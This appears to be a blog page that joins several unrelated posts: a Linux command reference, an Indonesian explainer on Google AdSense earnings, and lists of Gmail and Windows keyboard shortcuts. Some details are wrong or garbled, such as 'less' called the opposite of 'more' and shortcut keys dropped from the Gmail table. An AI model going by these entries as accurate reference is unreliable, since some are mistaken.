This command builds the slocate database. It will take several minutes to complete this command.This command must be used before searching for files, however cron runs this command periodically on most systems.locate whereis Lists all files whose names contain the string "whereis". directory.

more - Allows file contents or piped output to be sent to the screen one page at a time

less - Opposite of the more command

cat - Sends file contents to standard output. This is a way to list the contents of short files to the screen. It works well with piping.

whereis - Report all known instances of a command

wc - Print byte, word, and line counts

bg

bg jobs Places the current job (or, by using the alternative form, the specified jobs) in the background, suspending its execution so that a new user prompt appears immediately. Use the jobs command to discover the identities of background jobs.

cal month year - Prints a calendar for the specified month of the specified year.

cat files - Prints the contents of the specified files.

clear - Clears the terminal screen.

cmp file1 file2 - Compares two files, reporting all discrepancies. Similar to the diff command, though the output format differs.

diff file1 file2 - Compares two files, reporting all discrepancies. Similar to the cmp command, though the output format differs.

dmesg - Prints the messages resulting from the most recent system boot.

fg

fg jobs - Brings the current job (or the specified jobs) to the foreground.

file files - Determines and prints a description of the type of each specified file.

find path -name pattern -print

Searches the specified path for files with names matching the specified pattern (usually enclosed in single quotes) and prints their names. The find command has many other arguments and functions; see the online documentation.

finger users - Prints descriptions of the specified users.

free - Displays the amount of used and free system memory.

ftp hostname

Opens an FTP connection to the specified host, allowing files to be transferred. The FTP program provides subcommands for accomplishing file transfers; see the online documentation.

head files - Prints the first several lines of each specified file.

ispell files - Checks the spelling of the contents of the specified files.

kill process_ids

kill - signal process_ids

kill -l

Kills the specified processes, sends the specified processes the specified signal (given as a number or name), or prints a list of available signals.

killall program

killall - signal program

Kills all processes that are instances of the specified program or sends the specified signal to all processes that are instances of the specified program.

mail - Launches a simple mail client that permits sending and receiving email messages.

man title

man section title - Prints the specified man page.

ping host - Sends an echo request via TCP/IP to the specified host. A response confirms that the host is operational.

reboot - Reboots the system (requires root privileges).

shutdown minutes

shutdown -r minutes

Shuts down the system after the specified number of minutes elapses (requires root privileges). The -r option causes the system to be rebooted once it has shut down.

sleep time - Causes the command interpreter to pause for the specified number of seconds.

sort files - Sorts the specified files. The command has many useful arguments; see the online documentation.

split file - Splits a file into several smaller files. The command has many arguments; see the online documentation

sync - Completes all pending input/output operations (requires root privileges).

telnet host - Opens a login session on the specified host.

top - Prints a display of system processes that's continually updated until the user presses the q key.

traceroute host - Uses echo requests to determine and print a network path to the host.

uptime - Prints the system uptime.

w - Prints the current system users.

wall - Prints a message to each user except those who've disabled message reception. Type Ctrl-D to end the message.

Mengenai Google Adsense

Mengenai Google Adsense

Apakah Google Adsense itu ?Bagaimana sistematika nya ? Apa keuntungan nya ? Bagaimana cara implementasinya ? Lalu apa saja yang kita peroleh dari program ini ? Siapa yang menyelenggarakan nya ? ......

Banyak yang bertanya pada saya mengenai Google Adsense. Karena, beberapa informasi Google Adsense yang ada di Internet sebagian besar menggunakan bahasa inggris .Oleh karena itu , sekarang saya akan membahas mengenai Google Adsense dalam bahasa Indonesia. Google Adsense adalah salah satu produk Google yang dapat dipergunakan sebagai alat menghasilkan uang dengan meletakkan advertising Google di Web ataupun Blog kita.Konsep sederhana nya adalah anda ingin memperoleh penghasilan dari web yg anda miliki dan Google menyediakan fasilitas ini . Jadi, hanya dengan menaruh iklan Google di Web anda, anda dapat memperoleh penghasilan yang variatif dalam nilai nominal US Dollar.Variatif disini maksud nya adalah hasil yang anda dapat variatif pada jumlah klik di banner Google tersebut dan variatif pada besar nya nilai adverstising dari si Advertiser yang bekerja sama dengan Google.Hasil yang anda dapatkan biasa nya bervariatif antara US$ 0.01 - US$5 atau bahkan lebih besar dari itu ,tergantung besarnya nilai yang ditentukan Si Advertiser Di Google.

Sistematika nya adalah Setiap Advertiser di Google menentukan besar nya nilai yg mereka bayar untuk setiap klik nya, semakin banyak jumlah klik di website mereka maka akan makin banyak pula yang anda dapatkan.

Namun, bukan berarti anda hanya berharap dari penghasilan sebagai Publisher saja. Tidak jarang seorang yang sudah bergabung dalam program ini hanya untuk memperoleh US$1 atau US$2 dalam satu bulan saja.Oleh karena itu , saya referensikan ini sebagai pendapatan sampingan anda saja.


Inilah contoh report atas hasil yang sudah saya dapatkan selama hampir 2 bulan ini :


Bagaimana memulai nya ? Silakan lihat ke bagian bawah Blog ini ... dan klik icon yang bertuliskan " Earn Money by Showing relevant ads with Google AdSense ".

Gmail ShortCut

Gmail ShortCut

Keyboard shortcuts help you save time since you never have to take your hands off the keyboard to use the mouse. You'll need a Standard 101/102-Key or Natural PS/2 Keyboard to use the shortcuts.

To turn these case-sensitive shortcuts on or off, click Settings, and then pick an option next to Keyboard shortcuts.

Shortcut Key	Definition	Action
c	Compose	Allows you to compose a new message. + c allows you to compose a message in a new window.
/	Search	Puts your cursor in the search box.
k	Move to newer conversation	Opens or moves your cursor to a more recent conversation. You can hit to expand a conversation.
j	Move to older conversation	Opens or moves your cursor to the next oldest conversation. You can hit to expand a conversation.
n	Next message	Moves your cursor to the next message. You can hit to expand or collapse a message. (Only applicable in 'Conversation View.')
p	Previous message	Moves your cursor to the previous message. You can hit to expand or collapse a message. (Only applicable in 'Conversation View.')
o or	Open	Opens your conversation. Also expands or collapses a message if you are in 'Conversation View.'
u	Return to conversation list	Refreshes your page and returns you to the inbox, or list of conversations.
y	Archive* Remove from current view	Automatically removes the message or conversation from your current view. From 'Inbox,' 'y' means Archive From 'Starred,' 'y' means Unstar From any label, 'y' means Remove the label * 'y' has no effect if you're in 'Spam,' 'Sent,' or 'All Mail.'
m	Mute	Archives the conversation, and all future messages skip the Inbox unless sent or cc'd directly to you. Learn more.
x	Select conversation	Automatically checks and selects a conversation so that you can archive, apply a label, or choose an action from the drop-down menu to apply to that conversation.
s	Star a message or conversation	Adds or removes a star to a message or conversation. Stars allow you to give a message or conversation a special status.
!	Report spam	Marks a message as spam and removes it from your conversation list.
r	Reply	Reply to the message sender. + r allows you to reply to a message in a new window. (Only applicable in 'Conversation View.')
a	Reply all	Reply to all message recipients. +a allows you to reply to all message recipients in a new window. (Only applicable in 'Conversation View.')
f	Forward	Forward a message. + f allows you to forward a message in a new window. (Only applicable in 'Conversation View.')
	Escape from input field	Removes the cursor from your current input field.
+ s	Save draft	Holding the key while pressing s when composing a message will save the current text as a draft. Make sure your cursor is in one of the text fields -- either the composition pane, or any of the To, CC, BCC, or Subject fields -- when using this shortcut. Macintosh users should use + s.
#	Delete	Moves the conversation to Trash.

Combo-keys - Use the following combinations of keys to navigate through Gmail.

Shortcut Key	Definition	Action
then	Send message	After composing your message, use this combination to send it automatically. (Supported in Internet Explorer and Firefox, on Windows.)
y then o	Archive and next	Archive your conversation and move to the next one.
g then a	Go to 'All Mail'	Takes you to 'All Mail,' the storage site for all mail you've ever sent or received (and have not deleted).
g then s	Go to 'Starred'	Takes you to all conversations you have starred.
g then c	Go to 'Contacts'	Takes you to your Contacts list.
g then d	Go to 'Drafts'	Takes you to all drafts you have saved.
g then i	Go to 'Inbox'	Returns you to the inbox.

Windows ShortCut

Windows ShortCut

Windows system key combinations

•	F1: Help
•	CTRL+ESC: Open Start menu
•	ALT+TAB: Switch between open programs
•	ALT+F4: Quit program
•	SHIFT+DELETE: Delete item permanently

Windows program key combinations

•	CTRL+C: Copy
•	CTRL+X: Cut
•	CTRL+V: Paste
•	CTRL+Z: Undo
•	CTRL+B: Bold
•	CTRL+U: Underline
•	CTRL+I: Italic

Mouse click/keyboard modifier combinations for shell objects

•	SHIFT+right click: Displays a shortcut menu containing alternative commands
•	SHIFT+double click: Runs the alternate default command (the second item on the menu)
•	ALT+double click: Displays properties
•	SHIFT+DELETE: Deletes an item immediately without placing it in the Recycle Bin

General keyboard-only commands

•	F1: Starts Windows Help
•	F10: Activates menu bar options
•	SHIFT+F10 Opens a shortcut menu for the selected item (this is the same as right-clicking an object
•	CTRL+ESC: Opens the Start menu (use the ARROW keys to select an item)
•	CTRL+ESC or ESC: Selects the Start button (press TAB to select the taskbar, or press SHIFT+F10 for a context menu)
•	ALT+DOWN ARROW: Opens a drop-down list box
•	ALT+TAB: Switch to another running program (hold down the ALT key and then press the TAB key to view the task-switching window)
•	SHIFT: Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature
•	ALT+SPACE: Displays the main window's System menu (from the System menu, you can restore, move, resize, minimize, maximize, or close the window)
•	ALT+- (ALT+hyphen): Displays the Multiple Document Interface (MDI) child window's System menu (from the MDI child window's System menu, you can restore, move, resize, minimize, maximize, or close the child window)
•	CTRL+TAB: Switch to the next child window of a Multiple Document Interface (MDI) program
•	ALT+underlined letter in menu: Opens the menu
•	ALT+F4: Closes the current window
•	CTRL+F4: Closes the current Multiple Document Interface (MDI) window
•	ALT+F6: Switch between multiple windows in the same program (for example, when the Notepad Find dialog box is displayed, ALT+F6 switches between the Find dialog box and the main Notepad window)

Shell objects and general folder/Windows Explorer shortcuts

For a selected object:

•	F2: Rename object
•	F3: Find all files
•	CTRL+X: Cut
•	CTRL+C: Copy
•	CTRL+V: Paste
•	SHIFT+DELETE: Delete selection immediately, without moving the item to the Recycle Bin
•	ALT+ENTER: Open the properties for the selected object

To copy a file

Press and hold down the CTRL key while you drag the file to another folder.

To create a shortcut

Press and hold down CTRL+SHIFT while you drag a file to the desktop or a folder.

General folder/shortcut control

•	F4: Selects the Go To A Different Folder box and moves down the entries in the box (if the toolbar is active in Windows Explorer)
•	F5: Refreshes the current window.
•	F6: Moves among panes in Windows Explorer
•	CTRL+G: Opens the Go To Folder tool (in Windows 95 Windows Explorer only)
•	CTRL+Z: Undo the last command
•	CTRL+A: Select all the items in the current window
•	BACKSPACE: Switch to the parent folder
•	SHIFT+click+Close button: For folders, close the current folder plus all parent folders

Windows Explorer tree control

•	Numeric Keypad *: Expands everything under the current selection
•	Numeric Keypad +: Expands the current selection
•	Numeric Keypad -: Collapses the current selection.
•	RIGHT ARROW: Expands the current selection if it is not expanded, otherwise goes to the first child
•	LEFT ARROW: Collapses the current selection if it is expanded, otherwise goes to the parent

Properties control

•	CTRL+TAB/CTRL+SHIFT+TAB: Move through the property tabs

Accessibility shortcuts

•	Press SHIFT five times: Toggles StickyKeys on and off
•	Press down and hold the right SHIFT key for eight seconds: Toggles FilterKeys on and off
•	Press down and hold the NUM LOCK key for five seconds: Toggles ToggleKeys on and off
•	Left ALT+left SHIFT+NUM LOCK: Toggles MouseKeys on and off
•	Left ALT+left SHIFT+PRINT SCREEN: Toggles high contrast on and off

Microsoft Natural Keyboard keys

•	Windows Logo: Start menu
•	Windows Logo+R: Run dialog box
•	Windows Logo+M: Minimize all
•	SHIFT+Windows Logo+M: Undo minimize all
•	Windows Logo+F1: Help
•	Windows Logo+E: Windows Explorer
•	Windows Logo+F: Find files or folders
•	Windows Logo+D: Minimizes all open windows and displays the desktop
•	CTRL+Windows Logo+F: Find computer
•	CTRL+Windows Logo+TAB: Moves focus from Start, to the Quick Launch toolbar, to the system tray (use RIGHT ARROW or LEFT ARROW to move focus to items on the Quick Launch toolbar and the system tray)
•	Windows Logo+TAB: Cycle through taskbar buttons
•	Windows Logo+Break: System Properties dialog box
•	Application key: Displays a shortcut menu for the selected item

Microsoft Natural Keyboard with IntelliType software installed

•	Windows Logo+L: Log off Windows
•	Windows Logo+P: Starts Print Manager
•	Windows Logo+C: Opens Control Panel
•	Windows Logo+V: Starts Clipboard
•	Windows Logo+K: Opens Keyboard Properties dialog box
•	Windows Logo+I: Opens Mouse Properties dialog box
•	Windows Logo+A: Starts Accessibility Options (if installed)
•	Windows Logo+SPACEBAR: Displays the list of Microsoft IntelliType shortcut keys
•	Windows Logo+S: Toggles CAPS LOCK on and off

Dialog box keyboard commands

•	TAB: Move to the next control in the dialog box
•	SHIFT+TAB: Move to the previous control in the dialog box
•	SPACEBAR: If the current control is a button, this clicks the button. If the current control is a check box, this toggles the check box. If the current control is an option, this selects the option.
•	ENTER: Equivalent to clicking the selected button (the button with the outline)
•	ESC: Equivalent to clicking the Cancel button
•	ALT+underlined letter in dialog box item: Move to the corresponding item

---